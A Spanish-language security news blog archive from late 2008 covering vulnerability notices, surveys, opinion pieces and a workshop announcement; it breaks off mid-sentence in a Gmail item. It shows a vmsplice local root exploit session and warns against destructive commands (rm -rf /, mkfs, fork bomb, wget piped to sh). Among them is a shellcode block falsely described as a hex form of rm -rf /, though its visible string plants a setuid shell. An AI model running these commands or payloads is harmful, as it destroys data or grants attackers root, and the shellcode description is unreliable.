miércoles, 3 de diciembre de 2008

Vulnerabilidad remota en BlackBerry Desktop Software

Se ha anunciado una vulnerabilidad en BlackBerry Desktop Software, que puede ser utilizada por un atacante para lograr comprometer el sistema afectado.

BlackBerry Desktop Software, es un paquete de aplicaciones para PC que gestiona la conexión entre la BlackBerry y la cuenta de correo electrónico del usuario, el organizador y otras funciones.

El problema reside en un desbordamiento de búfer en el control ActiveX DWUpdateService y puede ser explotado cuando el usuario afectado visite una página web maliciosa que haga uso de este control. Afecta a las versiones 4.2.2 a 4.7 de BlackBerry Desktop Software, y puede permitir que un atacante remoto consiga el control de los sistemas afectados. Se recomienda instalar la actualización disponible desde:
www.blackberry.com/btsc/articles/749/KB16469_f.SAL_Public.html

lunes, 1 de diciembre de 2008

Lenovo tendrá una computadora que se bloquea mediante un SMS

La gente de Lenovo, en colaboración con Phoenix -conocida empresa de desarrollo de BIOS- están trabajando en conjunto con el fin de poder ofrecer un servicio que, mediante el envío de un sms, podrás bloquear una computadora a distancia.
La idea es que si, en caso de robo, puedas prohibirle al malintencionado usuario el que pueda utilizar la computadora robada . Para ello, cuando el mismo se conecte a una red móvil, de haber enviado el SMS de bloqueo, éste dejaría de funcionar hasta que el usuario introdujese un código que se creará en el primer momento una vez comprado. De no estar en una red, o estar apagado, se verificará el mensaje en el próximo inicio para hacer exactamente igual.
Aunque no se ha indicado qué es exactamente lo que se bloquea al recibir el SMS por parte del equipo robado, se especula que se trataría del disco duro del equipo, aunque se busca un método, también, para proteger los datos de los usuarios una vez bloqueado el equipo.

sábado, 29 de noviembre de 2008

Mini-test de seguridad informática (Usuarios Finales)

YA HABLANDO UN POCO DE LA IMPORTACIA DE LA SEGURIDAD EN LOS USUARIOS FINALES UN PEQUEÑO TEST DE EVALUACION:

A partir del 24/noviembre se encuentra disponible en línea una breve encuesta elaborada por el ArCERT, dependiente de la Oficina Nacional de Tecnologías de Información, a través de la cual usted podrá comprobar cuán informado se encuentra respecto al tema de la seguridad informática.

El objetivo de la misma es propiciar una reflexión sobre los riesgos más comunes a los que nos exponemos cuando utilizamos Internet y ayudarlo a conocer cómo evitarlos.

Es por ello que lo invitamos a medir sus conocimientos en la materia, a través de la resolución de un pequeño test de opción “Verdadero” o “Falso”, en torno a una serie de cinco preguntas. En caso de que alguna de sus respuestas no fuere acertada, dispondrá de una breve explicación sobre la alternativa correcta.

La encuesta está disponible en:

http://www.argentina.gov.ar/argentina/portal/encuesta/encuestaseguridad.dhtml

¿Porqué concientizar a los usuarios en la seguridad de su información y privacidad?

Es una pregunta muy interesante, pues muchos de los ataques en un equipo son en gran medida producto del descuido de los usuarios.
Esta información es de gran ayuda para entender la importancia que tiene el concientizar a los usuarios de la protección de su información y con ello de su privacidad.

Un fragmente de este articulo interesante:


"
La informática ha penetrado hacia lugares que uno antes no se habría ni imaginado. Por ello, muchísima información que hace mucho tiempo atrás se mantenía tradicionalmente en papel, hoy se conserva en computadoras. Ejemplo de ello pueden ser: la historia clínica de un paciente en un hospital, la información académica de un alumno, o los datos de una cuenta bancaria, etc.
Si bien la informática en sí ha hecho procesos más eficientes de lo que eran originalmente, también expone esa información, que de alguna manera antes no ocurría. Por ejemplo, si hablamos de la historia clínica de un paciente: años atrás vos a esos datos los tenías en un archivo de papel que estaba dentro de una oficina especial a la que solo se podía ingresar con llave. Entonces, de cierta manera podías argumentar que tenía un cierto nivel de protección.
La cuestión es hoy, que pasa si yo pongo esa información en una computadora y a esa PC la conecto a una red para que se pueda acceder de manera remota. Ahí entra la cuestión de la seguridad. Esto quiere decir que si quiero que ciertas personas tengan un acceso legitimo a esa información, puedan hacerlo. Pero además prevenir que quienes no están autorizados a acceder, no lo hagan. Entonces, este es el juego, que es lo que uno puede implementar para que eso se cumpla y proteger la información sensible”.

¿A que se le considera información sensible?
Información sensible es la información que cada uno de los usuarios considera crítica. Uno piensa que información sensible puede ser lo relacionada con lo militar o gubernamental. Pero a mí me pueden parecer sensibles las comunicaciones que mantengo por correo electrónico. Entonces, quiero hacer uso de esa tecnología, pero a la vez evitar que un tercero acceda a mis mensajes”.

¿A quien le interesa la seguridad informática?
Hay que diferenciar entre lo que es seguridad informática y lo que es seguridad de la información. Cuando hablas de seguridad informática muchas veces te estás refiriendo en particular a la seguridad de la información, pero en lo que tiene que ver con el procesamiento de esa información mediante equipos informáticos.
Entonces, un usuario final necesariamente no está capacitado en el área informática, pero si tiene interés por la seguridad de su información, y necesariamente no le interesa que mecanismos ni que tecnologías están trabajando. Simplemente quiero que no se viole la privacidad de su información. En síntesis, lo que le interesa al usuario final es la seguridad de la información en sí.
Lo mismo sucede con las organizaciones, empresas privadas e instituciones gubernamentales, lo que les debe importar es la seguridad de la información. Después, todas aquellas personas que estamos involucradas con cuestiones técnicas, ahí si estamos trabajando, porque implementamos seguridad informática para lograr seguridad de la información.
Esto no quiere decir que teniendo seguridad informática tengas seguridad de la información, porque por ahí la información es vulnerada donde no intervienen centros de cómputos”.

La ingeniería social como práctica para vulnerar humanos
“La ingeniería social se denomina al proceso mediante el cual logras un objetivo vulnerando la condición humana. Es decir, puedo tener varios mecanismos técnicos para obtener tu clave cuando accedes a tu correo electrónico. Supongamos que desde mi maquina ingreso a la tuya para obtener tus claves. Eso sería acceso a la información de manera técnica.
Otro método que puedo aplicar seria falsificar un mensaje de correo electrónico y enviártelo presumiendo que soy soporte técnico de quien te brinda servicio de correo electrónico a vos, diciéndote que tuvimos graves problema en la base de datos y es necesario que nos reportes tu usuario y contraseña. Entonces eso sería el uso de ingeniería social, donde mediante algo técnico se intenta explotar vulnerabilidades de características humanas”. "

El link donde pueden leer más

http://seguridad-informacion.blogspot.com/2008/11/porqu-concientizar-los-usuarios-en-la.html

Windows 7 !!!

Microsoft ha afirmado que Windows 7 tendrá plena compatibilidad con controladores, programas, etc. que funcionan correctamente con Windows Vista, de modo que no se repitan inconvenientes en cuanto a compatibilidad tal como sucedió al usar programas que funcionaban a la perfección en Windows XP y no en Windows Vista

Para más información cheque las páginas siguientes

http://winfuture.de/screenshots/Windows-7-Meilenstein-3-Build-6.1.6780-3500-1.html
http://winfuture.de/news,43570.html
http://winfuture.de/news,43634.html

Saludos

viernes, 28 de noviembre de 2008

Teoría de Seguridad en Sistemas Operativos

Considero que es altamente controversial la discusión entre al seguridad de los distintos sistemas operativos.

Personalmente considero que el software libre siempre tendrá una gran ventaja sobre los demás, que intentaré explicar aquí.

Para empezar, hay que distinguir un poco entre el software libre y el software gratuito, que aunque en inglés ambos se llamen "free software", la connotación puede significar un mundo de diferencia. Para ello les sugiero consultar la página oficial del proyecto GNU, y su video más reciente.

Esencialmente, para el punto de este artículo, el software libre es aquel donde cada uno tiene derecho a modificarlo y distribuirlo a su antojo.

Muchas veces uno piensa que Linux es sinónimo de software libre, pero no siempre es así.

Por ejemplo tenemos a Ubuntu que usa software "restringido" y que instala software propietario en varios lugares, desde codecs de video hasta controladores de hardware. Incluso Firefox, el famoso explorador de internet ha tenido que ser reemplazado en las distribuciones "puras" de GNU/Linux, como Debian, ya que su logo es comercial y no puede ser distribuido bajo el mismo nombre con modificaciones que no hayan sido hechas por Mozilla, por lo que se creó "IceWeasel", la vertiente libre de Firefox, para que los desarrolladores de Debian modificaran Firefox para cumplir con sus estándares de seguridad y estabilidad.

Sé que suena a burocracia, política y aspectos legales que finalmente son una molestia para un usuario final. Pero estos pequeños detalles deben ser cuidados por los proyectos de software libre para poder cumplir con su meta, que el usuario final pueda hacer con su sistema lo que quiera, que todo el mundo pueda contribuir y distribuir su código.

Pero, ¿qué tiene que ver esto con la seguridad?

Desde mi punto de vista es muy simple, imaginemos el mismo escenario en 2 sistemas operativos distintos, se encuentra una vulnerabilidad en un proceso del núcleo del sistema que permite a un atacante obtener el control del sistema.

El usuario lee a cerca de la vulnerabilidad y piensa en posibles soluciones antes de que salga al público una nueva versión modificada o un parche de seguridad:

Compilar su sistema operativo sin el módulo que activa el proceso vulnerable.
Modificar el código para corregir la vulnerabilidad.

Son soluciones que llevarán algo de tiempo y esfuerzo, pero esto le permitiría protegerse de los ataques que se puedan generar, sin embargo sólo se puede realizar dentro de un sistema operativo de software libre, en cualquier otro tipo de software, ya sea gratuito o comercial, el usuario está restringido a lo que dicta la licencia que adquirió al instalarlo y en la mayoría de los casos ni siquiera tendrá acceso al código, así es que al que no tiene un sistema operativo de software libre, sólo le queda esperar a que se emita algún parche que solucione esto o una nueva versión que lo haya arreglado.

Es decir, el usuario de software libre tendrá siempre la ventaja de que no depende de nadie más para su propia seguridad.

aircrack-ng

El viernes 28, 11:00-13:00hrs. Auditorio Alberto Barajas Celis [TALLER IMPARTIDO EN INGLÉS]

Thomas d'Otreppe | aircrack-ng

Se explicarán las nuevas tendencias en seguridad inalámbrica, con énfasis en los recientes ataques contra WPA. Habrá demostraciones en vivo, con la posibilidad de que los participantes prueben los ataques.

Creador de aircrack-ng, egresado de la Haute Ecole de Bruxelles. Diseñó, junto con Mati Aharoni, Offensive Security WiFu, un curso proactivo de seguridad inalámbrica.


Mas informacion:

http://intromision.fciencias.unam.mx/talleres.html

jueves, 27 de noviembre de 2008

Ernst & Young publica los resultados de la XI Encuesta Global de Seguridad de la Información

La consultora Ernst & Young ha publicado los resultados de la Encuesta Global de Seguridad de la Información (Global Information Security Survey) en su undécima edición, en la que se ofrece una mirada al actual estado de la seguridad de la información y ofrece recomendaciones para la mejora de cara al futuro.
La encuesta se realizó entre junio y agosto de este año, entre 1.400 organizaciones de más de 50 países de todo el mundo. Entre los resultados a destacar cabe mencionar la cada vez mayor preocupación por el impacto que puede tener un incidente de seguridad en la reputación e imagen de marca. Un 85% de los encuestados reseñaron los daños a la reputación y la marca como la consecuencia más importante ante un ataque, frente al 72% que destacó la pérdida de ingresos. Otras consecuencias preocupan aun menos, como las sanciones (68%) o acciones legales (un 65%).
Otro dato a reseñar, es que a pesar de la crisis las empresas parecen conscientes de la importancia de la seguridad de la información y tan solo un 5% de los encuestados dicen que reducirán su presupuesto para esta materia en el año que viene. Incluso, la mitad afirman que aumentarán su gasto en seguridad informática (mientras que un 45% dicen que la mantendrán). Ernst & Young concluye que las organizaciones reconocen que efectuar recortes en materia de seguridad podría tener un efecto contrario, además de que una gran mayoría considera que las amenazas y los ataques aumentarán durante la época de crisis.
Según revela la encuesta el uso de terceras empresas, y externalización de trabajos de seguridad de la información va en aumento, especialmente para la realización de trabajos de auditorías de seguridad (60%) y tests de penetración (59%). Además, se espera que estas dos actividades sufran incrementos significativos, de un 15% y un 18% respectivamente, de compañías que subcontratan este tipo de servicios.
El estudio se compone de diez puntos o aspectos sobre los que desglosa la información:* La protección de la reputación y la marca se ha convertido en un importante motor para la seguridad de la información.* A pesar de las presiones económicas, las organizaciones siguen invirtiendo en seguridad de la información.* Los estándares internacionales de seguridad de la información están adquiriendo una mayor aceptación y aprobación* Muchas organizaciones siguen luchando para lograr una visión estratégica de la seguridad de la información.* Ahora la privacidad es una prioridad, pero las acciones se quedan cortas.* Las personas siguen siendo el eslabón más débil en la seguridad de la información.* Los riesgos del crecimiento de subcontratas no se están corrigiendo.* La continuidad del negocio sigue dependiendo de tecnología de la información.* La mayoría de las organizaciones no están dispuestas a externalizar actividades claves de seguridad de la información.* Pocas empresas cubren los riesgos de seguridad de la información con seguros.

El informe puede descargarse desde:http://www.ey.com/Global/assets.nsf/International/TSRS_Global_Information_Security_Survey_2008/$file/TSRS_Global_Information_Security_Survey_2008.pdf

Revelación de información a través de ICMP en Check Point VPN-1

Se ha descubierto una vulnerabilidad en Check Point VPN-1 que podría permitir a un atacante remoto obtener las direcciones IP de la red interna.

El fallo reside en un manejo incorrecto de paquetes con un valor TTL bajo. Al recibir paquetes en puertos del cortafuegos que son mapeados a puertos internos, dichos paquetes son reescritos para enviarlos al servidor de administración del firewall. Con un TTL corto este proceso falla y sea crea un paquete ICMP de respuesta que contiene la dirección interna del cortafuegos. Un atacante remoto podría obtener las direcciones IP internas a través de paquetes especialmente manipulados.

Existe una prueba de concepto que explota esta vulnerabilidad. Check Point ha confirmado que en breve publicará una actualización para corregir este problema.

Falso positivo de AVG bloquea una dll legítima de Windows

La gente de AVG se enfrenta a un problema: hace algunos días, la base de firmas de este popular antivirus se actualizó con información, indicando que el archivo user32.dll, necesaria para la ejecución de Windows, era un virus peligroso, por lo que ofrecía los servicios para la eliminación del mismo.
La verdad era otra: se trataba de un falso positivo -un virus supuesto, pero que nunca lo ha sido, y por un error del antivirus, éste se detecta como virus- y que produjo muchos problemas a los usuarios de Windows luego de que se les indicara que este archivo contenía un peligroso virus.
El supuesto virus detectado, se trata de un Malware PSW.banker4.APSA y por ende, ofrece diferentes soluciones para la desinfección. Dicho archivo, supuestamente infectado, contiene importantes elementos gráficos para la carga de la parte visual del sistema operativo, GUI.
El problema del falso positivo afectó a muchos usuarios de Windows XP SP2 y SP3, y presentaban una vez detectado el falso positivo, problemas para reiniciar o cargar Windows, por la librería faltante.

martes, 25 de noviembre de 2008

Informe de Symantec Revela del Auge de la Economía Clandestina

CUPERTINO, California. - 24 de noviembre de 2008. Symantec Corp. anunció hoy su informe sobre la economía clandestina. El informe describe detalladamente que la economía clandestina en Internet ha madurado para convertirse en un mercado global y eficaz en donde los bienes robados y los servicios relacionados con el fraude se venden y compran de manera común, y donde se mide en millones de dólares el valor estimado de los bienes ofrecidos por los vendedores individuales. El informe se deriva de los datos recolectados de servidores clandestinos por la organización Security Technology and Response (STAR) de Symantec, entre el 1 de julio de 2007 y el 30 de junio de 2008.

El valor potencial del total de bienes anunciados observado por Symantec fue superior a $276 millones de dólares en el periodo reportado. Este valor se determinó usando los precios anunciados de los bienes y servicios y midiendo la suma de dinero que obtendrían los anunciantes si liquidaran su inventario.

La información de las tarjetas de crédito es la categoría de bienes y servicios con más anuncios en la economía clandestina, con 31 por ciento del total. Aunque los números de las tarjetas de crédito se vendían entre $0.10 y $25 dólares por tarjeta, el límite de crédito promedio de tarjetas robadas anunciadas, según lo observado por Symantec, fue superior a los $4,000 dólares. Symantec calcula que el valor potencial de las tarjetas de crédito anunciadas durante el periodo del reporte alcanza aproximadamente $5,300 millones de dólares.

La popularidad de la información de las tarjetas de crédito se debe probablemente a las diversas formas en que se puede obtener esta información para ser utilizada con fines fraudulentos; las tarjetas de crédito son fáciles de usar para realizar compras en Internet y generalmente es difícil que los comerciantes o los proveedores de crédito identifiquen las transacciones fraudulentas antes de que los estafadores las concreten y reciban sus bienes. Además, la información de las tarjetas de crédito se vende generalmente a los estafadores por volumen, con descuento o se obsequia al realizar grandes compras.

La segunda categoría más común de bienes y servicios anunciados fueron las cuentas bancarias con un 20 por ciento del total. La información de cuentas bancarias robadas se vende entre $10 y $1,000 dólares americanos, mientras que el saldo promedio de las cuentas bancarias robadas está cerca de los $40,000 dólares.

Haciendo un cálculo que considera el saldo promedio anunciado de una cuenta bancaria junto con el precio promedio de las cuentas robadas, el valor total de las cuentas bancarias anunciadas entre el 1 de julio de 2007 y el 30 de junio de 2008 correspondió a $ 1,700 millones de dólares. La popularidad de la información de las cuentas bancarias se debe probablemente a su potencial para realizar pagos y a la velocidad con que éstos se realizan. Hubo un caso en que se transfirió dinero de las cuentas bancarias hacia lugares no rastreables en menos de 15 minutos usando sistemas en línea.

Durante el periodo del informe, Symantec observó 69,130 anunciantes activos y un total de 44,321,095 mensajes colocados en foros clandestinos. El valor potencial del total de bienes anunciados por los 10 principales anunciantes fue $16.3 millones de dólares en tarjetas de crédito y $2 millones de dólares en lo referente a cuentas bancarias. Además, el valor potencial de los bienes anunciados por el anunciante más activo identificado por Symantec durante el periodo del estudio fue de $6.4 millones de dólares.

La economía clandestina es geográficamente diversa y genera ingresos a los ciberdelincuentes que van desde grupos indefinidos de personas hasta grupos organizados y sofisticados. Durante este periodo, América del Norte tuvo el mayor número de estos servidores, con 45 por ciento del total; la región de Europa, Medio Oriente y África albergó el 38 por ciento; seguidas de Asia-Pacífico con 12 por ciento y América Latina con un 5 por ciento. Cabe mencionar que las ubicaciones geográficas de los servidores clandestinos cambian constantemente para evadir su localización y detección.

Como lo señala el Informe de Symantec sobre la Economía Clandestina, los cibercriminales están aprovechándose de la información que recolectan de manera ilegal de los consumidores y las empresas. Dado que estos individuos y grupos continúan diseñando nuevas herramientas y técnicas para defraudar a los usuarios legítimos alrededor del mundo, la protección contra estos ataques debe convertirse en prioridad internacional”, dijo Stephen Trilling, vicepresidente de Symantec Security Technology and Response.

Para conocer detalles adicionales acerca del Informe de Symantec sobre la Economía Clandestina, pueden dirigirse a: http://www.symantec.com/es/mx/about/news/release/article.jsp?prid=20081124_01

Fuente: www.cnnexpansion.com/blogs/

Descubren vulnerabilidad en el kernel de Windows Vista

La compañía austriaca de seguridad Phion reveló una vulnerabilidad en el núcleo de Vista que puede producir un desbordamiento de buffer colgando el sistema, o que puede ser explotado para inyectar código malicioso y comprometer la seguridad del equipo cliente.

La vulnerabilidad se encuentra en el sistema de red cuando se envían solicitudes a la API “iphlpapi.dll”. El error está comprobado en Vista Ultimate y Enterprise y según los investigadores “es muy probable que afecte al resto de versiones de 32 y 64 bits”. Windows Xp no está afectado, según explican.

El exploit puede ser usado para apagar la computadora o provocar la pérdida de conectividad de la Red usando ataques de denegación de servicio (DoS). Aunque se necesitan permisos de administrador para aprovechar la vulnerabilidad, la misma podría ser explotada mediante envío de paquetes DHCP sin permisos de administración, según explican desde el grupo de seguridad austriaco, que informó que llevaban trabajando desde el mes pasado con responsables del “Microsoft Security Response Center” para “ubicar, clasificar y corregir la vulnerabilidad”.

Una solución que en principio no llegará hasta la publicación del segundo paquete de servicio de Windows Vista, aunque no se conoce que la vulnerabilidad haya sido explotada.

videos sobre seguridad informática

HOLA A TODOS, ESPERO SE ENCUENTREN BIEN.
NAVEGANDO POR LA RED COMO TODOS LOS DIAS, ENCONTRE UNA PAGINA MUY INTERESANTE REFERENTE A LA SEGURIDAD INFORMÁTICA NO SE SI ALGUIEN LA CONOSCA,EL SITIO ES www.dragonjar.org. EN ESPECIAL ENCONTRE UNA PÁGINA EN DONDE HAY UNA GRAN VARIEDAD DE VIDEOS DE SEGURIDAD MUY INTERESANTES Y QUE NOS PUEDEN SERVIR A TODOS NOSOTROS, LES DEJO EL LINK EXACTO.

http://www.dragonjar.org/videos-y-video-tutoriales-relacionados-con-la-seguridad-informatica.xhtml.

NOS VEMOS.
CUIDENSE

Ingenieria INVERSA

Para saber un poco mas relacionado con la ingeniería inversa y el papel de esta ante problemáticas como la piratería.
Considerado algunas veces como un mal necesario.


"La ingeniería inversa es una metodología para analizar el diseño de un dispositivo o sistema. El objetivo del estudio varia ya que como toda metodología o herramienta en el área de seguridad es un arma de dos filos. Por un lado se puede utilizar para conocer como funciona un sistema y darle la vuelta a los sistemas de protección contra copias no autorizadas. Por otro lado es una buena herramienta para entender el funcionamiento de los nuevos virus, poder erradicarlos y/o diseñar una vacuna."

Dejo la liga del articulo completo :

http://blog.segu-info.com.ar/2008/11/ingenieria-inversa.html

lunes, 24 de noviembre de 2008

Local Root Exploit

Local Root Exploit es un exploit que afecta al Kernel Linux versión 2.6 de Ubuntu y Debian, el exploit es necesario ejecutarlo como usuario local, para así obtener identidad de root.

Los Kernel Linux afectados son desde la versión 2.6.17 hasta 2.6.24. Por el momento para solucionar el problema de seguridad, habría que compilar el kernel eliminando vmsplice.

$ gcc exploit.c -o exploit
$ whoami
usuario
$ ./exploit
-------

----------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root

Exploit: http://www.milw0rm.com/exploits/5092

Keylogger inalámbrico

Es relativamente frecuente la posibilidad de que las señales que emiten los teclados inalámbricos puedan ser interceptadas por una persona con suficientes conocimientos como para descifrar la señal y poder leer cada tecla pulsada de un teclado.

Pero, ¿y si el teclado tiene cable?¿estamos seguros? Un estudio de un grupo Suizo ha demostrado que no.

El grupo LASEC de seguridad y criptografía de Lausana (Suiza), ha conseguido desarrollar 4 métodos diferentes para capturar las interferencias electromagnéticas que producen los teclados con cable y recuperar el texto escrito en ellos.

Han realizado pruebas con 11 diferentes teclados compradors entre 2001 y 2008, tanto USB como PS/2 así como integrados en portátiles, y todos y cada uno de ellos ha sido vulnerable como mínimo a uno de sus 4 ataques. El alcance físico de los ataques es de hasta 20 metros y puede haber paredes de por medio.

http://foro.hackhispano.com/showthread.php?s=3c845b6603b2344451d20c9a831a0e66&p=162240#post162240

Sigue Mac ?

Esta semana han aparecido dos amenazas para el sistema operativo de Apple, un troyano con la habilidad de descargar e instalar programas maliciosos a la elección del atacante. Además de ello una aplicación hacker para crear puertas traseras.

El troyando en cuestión es ‘OSX.RSPlug.D’ según Intego, el especialista de seguridad que descubrió la amenaza. Afirma que es una variante de un viejo programa malicioso con un nuevo instalador. “Es un downloader, y contacta con un servidor remoto para descargar los archivos e instalarlos [...] Esto significa que, en el futuro, el downloader podría ser capaz de instalar otro tipo de programas aparte del que actualmente instala“. En el resto de características el troyano es similar a las previas versiones de RSPlug, que empezó su andadura en octubre de 2007, instala un programa DNSChanger, que redirige el tráfico de Internet del usuario a través de un DNS malicioso llevando a los usuarios finales a sitios de phising o a páginas de anuncios.

Intego afirma que el troyano OSX.RSPlug.D ha llegado esta semana junto con otra amenaza distinta, OSX.TrojanKit.Malez según Intego y según Symantec y Trend Micro, OSX.Lamzev. En esta ocasión se trata de una aplicación hacker diseñada para crear e instalar puertas traseras. Sin embargo la compañía afirma que no es una amenaza seria dado que el potencial de la misma se basa en el acceso físico al sistema a infectar.

Empresas de seguridad ya llevan anunciando desde hace tiempo que la plataforma Mac no es tan segura como los usuarios creen, de momento Apple no ha respondido a dicha afirmación.

Fuente: http://www.theinquirer.es/2008/11/23/mac-os-x-bajo-ataque-van-dos-esta-semana.html

domingo, 23 de noviembre de 2008

Los 7 comandos comandos más peligrosos de GNU/LINUX

Creo que muchos sabemos del famoso comando rm -rf / que puede destruir todo lo que tengamos en nuestro GNU/Linux, pero tambien existen otros comandos que tambien son peligrosos y que no tenemos que ejecutarlos nunca, aqui una pequeña traduccion:

1. Codigo:

rm -rf /
Como les dije, este poderoso comando borra todos los archivos de nuestro directorio raiz “/”.

2. Codigo:

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es la versión hexadecimal de [rm-rf /] que pueden engañar incluso los no experimentados usuarios de GNU/Linux.

3. Codigo:

mkfs.ext3 /dev/sda

Esto reformatea todos los archivos del dispositivo que se menciona después de que el comando mkfs.

4. Codigo:

:(){:|:&};:

Conocida como bomba fork, este comando ejecutar un gran número de procesos hasta que el sistema se congela. Esto puede conducir a la corrupción de datos.

5. Codigo:

any_command > /dev/sda

Este comando provoca perdida total de datos, en la particion que se menciona en el comando

6. Codigo:

wgethttp://some_untrusted_source -O- | sh

Nunca descargar fuentes no confiables y que a continuacion se ejecuten, pueden ser codigos maliciosos

7. Codigo:

mv/home/yourhomedirectory/* /dev/null

Este comando es para mover todos los archivos de tu directorio home a un lugar que no existe, nunca veras tus archivos de nuevo

Las 6 razones por las que Windows pierde

Revisando el blog Linux los Angeles, me llamó la atención este título, dejo la nota tal cual, haber qué les parece...

Razón 6: El orgullo
Microsoft siempre ha sido vista como la bestia corporativa que es. Siempre es más fácil degradar para aquéllos que están arriba que para los que están comenzando. Microsoft está en una posición de dominación corporativa y personal. Con un control total del entorno Windows y la plataforma Microsoft Office, pueden determinar cuando los usuarios deben actualizarse. La gente, en general, prefiere elegir y actualmente no hay competidor, en cuanto aceptación, de Microsoft Office. Open Office es un competidor pero no ha sido tomado tan en serio cono Microsoft Office. Es fácil centrarse en aquellos que están acostumbrados a usar la opción mayoritaria, pero es mucho más difícil hacer cambiar a la minoría que no elige tu opción.

Razón 5: Malware
Es una idea simple, Microsoft tiene la mayor base de usuarios y compañías de software desarrollando. Si un hacker o cracker decide atacar a un grupo, tiene mucho más sentido centrarse en la plataforma que más gente potencial tiene como víctima. Microsoft lo sabe y está trabajando en ello pero a día de hoy es imposible hacer frente a todas las amenazas y a todos los frentes

Razón 4: Google
Google ha crecido mucho como empresa y actualmente está comenzando a hacer frente al gigante de Redmond en varios puntos. Muchos de sus productos disfrutan de la mentalidad libre de la compañía así como de la etiqueta enorme de gratuita. Las aplicaciones que ha puesto en el mercado pese a ser la mayoría beta, son de alta calidad, no hace falta mencionar GMail, el buscador Google, Chrome que está comenzando a despegar, etcétera.
Google ha dominado el terreno online y ahora está acercándose a Microsoft en aspectos más tradicionales como son el navegador web, Google Chrome, y el terreno de terminales móviles, con Android, ambos gratuitos, que frente a Windows Mobile, que tiene coste de licencia para los fabricantes, está dando y dará mucho que hablar.

Razón 3: Código abierto
La comunidad de código abierto sigue creciendo. Desde sistemas operativos como Ubuntu, pasando por el navegador Firefox, la comunidad está lanzando proyectos cada día más válidos, y gratuitos ante opciones de Microsoft.

Razón 2: Vista
Aparte del estado en el que Vista está hoy día, se lanzó en un estado realmente verde. Además de ello se ha demostrado y Microsoft ha admitido, alterar los requisitos mínimos del sistema operativo en beneficio de Intel, lo que sin duda ha alterado la experiencia de usuario en muchas máquinas que estaban por debajo de lo que se puede admitir como aceptable. Ese es uno de los motivos por los que la gente ha decidido volver a XP o buscar alternativas con otros sistemas operativos Linux. A día de hoy, Vista ha madurado bastante y si éste hubiera sido su estado inicial otro gallo cantaría, pero, la gente ya ha decidido y Vista no es aceptable.

Razón 1: Apple
Apple ha dado un gran salto en cuota de mercado gracias al fiasco de Vista. Apple ha visto la posibilidad y no ha dudado en atacar a Microsoft. Como ejemplo de ello, tenemos los anuncios de Apple VS PC que se han convertido en el spot número 1. Ninguna compañía se gasta tanto dinero como los de Cupertino para reducir la presencia de Microsoft en los ordenadores personales de consumo. Apple se muestra como la mejor opción, en términos de sistema operativo, disponible para los consumidores que quieran una experiencia libre de problemas, siempre dentro de lo posible, claro está. Apple se ha centrado en desarrollar sus equipos que funcionan sin más, y tanto los dispositivos, periféricos y software quedan perfectamente integrados.

Segu-Info en diario Perfil (x2)

Segu-Info en diario Perfil (x2)

Este domingo Segu-Info a aparecido en dos notas en el diario argentino Perfil. El primer artículo Argentina, vivero de hackers que hacen temblar a Internet hace un recorrido por los diversos personajes del under y profesionales de seguridad argentinos.

En la segunda se trata el tema actual de las redes sociales y su repercusión y se hace referencia al estudio de Segu-Info sobre Desconocidos en las Redes sociales.

La policía busca cómo entrar en los ordenadores del etarra 'Txeroki'

La policía busca cómo entrar en los ordenadores del etarra 'Txeroki'

La información contenida en los dos ordenadores portátiles incautados al jefe militar de ETA, Mikel Garikoitz Azpiazu 'Txeroki', resultará muy difícil que pueda ser descifrada a menos que el etarra facilite la contraseña o que los investigadores, en un golpe de suerte, acierten la clave de acceso.

Así lo han asegurado fuentes de la lucha antiterrorista, que han confirmado que los dos equipos informáticos se encuentran protegidos con el ya conocido programa PGP, utilizado desde hace años por los miembros de la banda terrorista para codificar sus archivos y obstaculizar el trabajo de investigación de la policía.

El PGP, del inglés 'Pretty Good Privacy' o 'Privacidad bastante buena', es un programa gratuito de libre acceso que se descarga en Internet en unos pocos minutos, pero que proporciona un blindaje prácticamente impenetrable a la acción de los curiosos.

Algunos expertos han remarcado además que, a pesar de las leyendas que circulan, los servicios de inteligencia no disponen de una llamada "puerta trasera", esto es, un agujero en la seguridad del programa que permita acceder a su contenido.

Prohiben la venta del keylogger CyberSpy

Prohiben la venta del keylogger CyberSpy

Un Tribunal de Distrito de EE.UU. ha detenido temporalmente la venta de software espía y keylogger RemoteSpy a petición de la Comisión Federal de Comercio, que reclama el software viola la Ley FTC (Federal Trade Commission).

La FTC presentó una denuncia (PDF) en contra la empresa de Florida CyberSpy, alegando que ha violado la Ley FTC a través de la venta de software que puede ser controlado remotamente por alguien que no sea el propietario o usuario autorizado del ordenador. Además su software puede ser instalado sin el conocimiento del propietario, y puede utilizarse para recabar información subrepticiamente, revelando información personal. La FTC también alega que CyberSpy recoger y almacena información personal, recopilada con RemoteSpy.

El tribunal, en su orden de restricción temporal presentada el 6 de noviembre contra CyberSpy, dijo que hay posibilidad de que la FTC pueda probar que el software espía ha violado la Ley.


Fuente: http://news.cnet.com/8301-13578_3-10099123-38.html

Una vulnerabilidad de Gmail permitiría a atacantes reenviar correos

Una vulnerabilidad de Gmail permitiría a atacantes reenviar correos

Una vulnerabilidad de seguridad de Gmail podría permitirle a un atacante fijar filtros en las cuentas de correo de los usuarios sin que lo sepan, segun una prueba de concepto publicada el domingo en GeekCondition.com.

En su publicación, Brandon describe que la vulnerabilidad ha provocado que alguna gente pierda sus nombres de dominios registrados mediante GoDaddy.com.

Sin publicar el exploit por completo, aquí está la clave cuando Brandon explica que este se basa en obtener las variables que representan el nombre de usuario y el "at":

